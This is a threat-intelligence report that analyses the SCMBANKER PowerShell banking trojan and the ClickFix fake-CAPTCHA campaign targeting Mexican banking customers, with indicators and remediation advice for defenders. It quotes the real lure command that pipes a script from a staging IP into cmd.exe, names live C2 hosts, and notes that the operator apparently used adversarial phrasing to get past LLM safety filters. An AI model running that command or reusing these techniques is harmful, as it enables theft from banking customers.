Threat reportMalwareTL-2026-1175

SCMBANKER PowerShell Banking Trojan Targets Mexican Financial Sector via ClickFix Fake CAPTCHA Lures (REF6045)

highACTIVE

SCMBANKER PowerShell Banking Trojan Targets Mexican (TL-2026-1175), also tracked as REF6045, is a high-severity malware campaign, first published 2026-07-10. It is attributed to REF6045 operator with low confidence, affects Microsoft Windows (Run dialog / cmd.exe / PowerShell / VBScript hosts), maps to 30 MITRE ATT&CK techniques (T1010, T1016, T1027), and is covered by 9 detection rules and 35 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
30MITRE ATT&CK
Actors
1REF6045 operator
Detection rules
9SPL · KQL · Sigma
IOCs
35Indicators of compromise

Key facts for TL-2026-1175

Threat ID
TL-2026-1175
Also known as
REF6045, SCMBANKER
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution
REF6045 operator
Attribution confidence
LOW
Motivation
FINANCIAL
Target sectors
financial services, banking, fintech, payment processors, cryptocurrency, investment platforms, government administration, telecom
Target regions
mexico, Latin America
Detection rules
9
Indicators of compromise
35

Malware and tooling in SCMBANKER PowerShell Banking Trojan Targets Mexican

Malware and tooling: SCMBANKER, Remote Utilities

How SCMBANKER PowerShell Banking Trojan Targets Mexican works

Elastic Security Labs tracked REF6045, an operator-assisted banking fraud campaign deploying the PowerShell-based SCMBANKER toolkit against Mexican banks, fintechs, payment processors, and crypto exchanges via ClickFix fake-CAPTCHA lures. The toolkit combines credential theft, clipboard hijacking (CLABE/card swapping), vishing overlays, screenshot exfiltration, and Remote Utilities RAT deployment, with strong evidence the code was AI-generated via an LLM prompted in Spanish.

REF6045 is an active, operator-assisted banking fraud operation tracked by Elastic Security Labs (researchers Jia Yu Chan and Salim Bitam), first observed with toolkit components dating to at least October 2025 and publicly disclosed 2026-07-08. Victims are lured to fake CAPTCHA verification pages styled as "Google Verificación Segura" that instruct them to paste and execute a command in the Windows Run dialog — the ClickFix social-engineering technique. The initial command (`cmd /c curl -k http://68.211.161.46/validation.txt | cmd.exe`) downloads a batch script that drives a six-stage execution chain: (1) launching Microsoft Edge in kiosk mode against fakeupdate.net to distract the victim with a fake Windows Update screen; (2) repeatedly relaunching with -Verb RunAs every 20 seconds to fatigue the victim into granting UAC admin consent, displaying the Spanish-language message "Se requieren permisos de administrador para actualizar su sistema..."; (3) confining the mouse cursor to a 1x1 pixel region via the Win32 ClipCursor API to prevent victim interference during installation; (4) using bitsadmin to pull the full PowerShell toolkit from an open directory to C:\Users\Public\; (5) establishing persistence via run.vbs (an HKCU Run key, three startup-folder copies, and an infection-timestamp marker id.txt); and (6) forcing a reboot via shutdown /r /t 02 to trigger the newly installed persistence.

The resulting SCMBANKER toolkit is a modular PowerShell-based banking trojan launched by run.vbs and comprising: cliente.ps1 (C2 beacon posting machine profile every 30 seconds), jujuzkt.ps1/jujuzkt2.ps1 (banking-session window-title monitoring and clipboard-based phishing redirection), mensaje1.ps1/mensaje.ps1/mensajeoff.ps1 (vishing dispatcher plus hard-lock and soft-lock fake bank-warning overlay windows), rotor1.ps1/screen2.ps1 (screenshot capture, ~42 screenshots per banking trigger over 5 minutes), rotor2.ps1/rotor.ps1 (process-name mutation wrappers), key.ps1 (Base64-obfuscated Win32 API keylogger with an unused Telegram exfiltration path, falling back to HTTP POST), clip.ps1/clip2.ps1 (CLABE and card-number clipboard hijackers using prefix/BIN matching to swap in attacker account numbers), avs.ps1/instaler.ps1/remoto.ps1 (silent deployment of the commercial Remote Utilities Host RAT, including registry-based callback configuration and UninstallString removal to resist removal), edifhjwe.ps1 (self-update mechanism that wipes and redeploys the toolkit while preserving state files), and correr.ps1 (arbitrary operator-issued PowerShell execution). cursor2.exe, a compiled AutoIt binary, replaces the system cursor with an invisible cursor to further obscure operator/victim interaction.

C2 infrastructure centers on negratomasa2026.online (and alternate gestionmontelavaria2026.online, plus IP-based fallback 185.242.246.169), exposing distinct endpoints for beaconing, banking alerts, screenshot exfiltration, keylog exfiltration, and remote-configuration text files controlling bank keyword lists, phishing redirect targets, vishing victim-IP mappings, and attacker CLABE/card numbers for clipboard substitution. ClickFix landing pages were hosted at ratonvaquero2026.online, monteviral2026.duckdns.org, and osogransd.online, with toolkit file staging on 68.211.161.46 and 216.250.112.100.

Elastic researchers assess the toolkit's source code was substantially AI-generated: consistent banner-comment scaffolding ("INTERVALOS DE TIEMPO", "DICCIONARIOS Y VARIABLES", "FUNCIONES", "INICIO", "LOOP PRINCIPAL"), clean function names paired with hand-shortened variables, instruction-like comments directly above corresponding code consistent with Copilot/Cursor-style assistant output, and self-documenting Base64 obfuscation (e.g., a literal comment identifying `user32.dll` immediately beside its Base64-encoded string). Profanity-laden comments cluster specifically in the mutation rotator and keylogger modules, suggesting the operator used adversarial phrasing to bypass LLM safety filters for those more sensitive components, then applied light manual obfuscation with minimal review. Operator OPSEC failures — an open directory exposing the entire toolkit, a briefly-hosted full web-root archive (zkt.zip), and an unauthenticated targeting-configuration editor at /b/editor.php — allowed Elastic to fully reconstruct the operation, including a live victim counter visible on the operator's dashboard confirming active, ongoing victimization of Mexican financial-sector customers.

MITRE ATT&CK techniques used in TL-2026-1175

Discovery

T1010 Application Window Discovery; T1016 System Network Configuration Discovery; T1082 System Information Discovery

Defense Evasion

T1027 Obfuscated Files or Information; T1036.005 Match Legitimate Resource Name or Location; T1070 Indicator Removal; T1140 Deobfuscate/Decode Files or Information; T1564.001 Hidden Files and Directories

Exfiltration

T1041 Exfiltration Over C2 Channel

Credential Access

T1056.001 Keylogging

Execution

T1059.001 PowerShell; T1059.003 Windows Command Shell; T1059.005 Visual Basic; T1204.001 Malicious Link

Command and Control

T1071.001 Web Protocols; T1102 Web Service; T1105 Ingress Tool Transfer; T1219 Remote Access Tools

Collection

T1113 Screen Capture; T1115 Clipboard Data; T1119 Automated Collection

stealth

T1197 BITS Jobs

Impact

T1529 System Shutdown/Reboot; T1657 Financial Theft

Persistence

T1547.001 Registry Run Keys / Startup Folder

Privilege Escalation

T1548.002 Bypass User Account Control

Initial Access

T1566.002 Spearphishing Link

Resource Development

T1583.001 Domains; T1587.001 Malware

defense-impairment

T1685 Disable or Modify Tools

Affected products and versions in SCMBANKER PowerShell Banking Trojan Targets Mexican

  • Microsoft — Windows (Run dialog / cmd.exe / PowerShell / VBScript hosts)
    Vulnerable versions: All supported Windows desktop versions
  • N/A — Mexican banking, fintech, payment processor, and cryptocurrency exchange customers
    Vulnerable versions: End-user victims of ClickFix social engineering

Remediation for SCMBANKER PowerShell Banking Trojan Targets Mexican

Immediate actions

  • Block C2 domains negratomasa2026[.]online, gestionmontelavaria2026[.]online, and IP 185.242.246[.]169 at web/DNS proxy and firewall
  • Block ClickFix lure domains ratonvaquero2026[.]online, monteviral2026.duckdns[.]org, osogransd[.]online, ssinvestigaciones[.]com, and bancaporinternetbbmx[.]online
  • Block file-staging hosts 68.211.161[.]46 and 216.250.112[.]100
  • Alert on and block execution of curl/bitsadmin piping remote content directly to cmd.exe/PowerShell
  • Hunt for HKCU Run key value 'run' pointing to run.vbs and for C:\Users\Public\ containing unexpected .ps1/.vbs/.txt artifacts
  • Isolate and reimage any host with C:\Users\Public\id.txt, agent.txt, or 99.kut present

Workarounds

  • Restrict local admin rights to reduce UAC-fatigue attack success
  • Enforce application allow-listing to block unsigned PowerShell/VBScript execution from user-writable paths (C:\Users\Public, %APPDATA%)

Longer-term hardening

  • Deploy endpoint controls to block/alert on the Windows Run dialog being used to execute curl/cmd/PowerShell one-liners (ClickFix pattern)
  • User-awareness training on fake CAPTCHA/verification pages instructing users to paste commands into Run
  • Restrict or monitor bitsadmin usage as a download utility on endpoints
  • Deploy clipboard-integrity monitoring for banking/finance workstations to detect CLABE/card-number substitution
  • Monitor for unauthorized installs of Remote Utilities Host (or other commercial RAT/RMM tools) outside sanctioned IT use

Weaknesses (CWE) in SCMBANKER PowerShell Banking Trojan Targets Mexican

CWE-494, CWE-829, CWE-311

Timeline of SCMBANKER PowerShell Banking Trojan Targets Mexican

  • Earliest observed C2 screenshot-exfiltration timestamp (10:03 p.m. 08/12/2025) embedded in SCMBANKER's operator-facing communications format, indicating victim activity already being recorded and reported to operators.
  • Earlier SCMBANKER toolkit components identified via VirusTotal pivoting, indicating active development since at least October 2025 with several months of iteration.
  • REF6045 ClickFix campaign actively targeting Mexican banking, fintech, and cryptocurrency customers, per operator dashboard showing live victim counter.
  • Elastic telemetry first surfaces a host using bitsadmin to download suspicious PowerShell scripts from an open directory, triggering the investigation that became REF6045.
  • Elastic documents operator OPSEC failures including an open directory at 68.211.161.46 exposing the full toolkit and an unauthenticated targeting-configuration editor.
  • The Hacker News, GBHackers, CyberPress, and SecurityBrief publish coverage of the SCMBANKER/REF6045 campaign disclosure.
  • Elastic Security Labs researchers Jia Yu Chan and Salim Bitam publish REF6045 technical analysis detailing the SCMBANKER toolkit, C2 infrastructure, and AI-assisted development artifacts.
  • TL-Intel-Harness ingests and researches the SCMBANKER/REF6045 campaign from RSS feed coverage.

Sources cited for SCMBANKER PowerShell Banking Trojan Targets Mexican

Detection coverage for TL-2026-1175

As of 2026-07-10, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1175 across Splunk SPL, Microsoft KQL and Sigma, covering 35 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
35 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats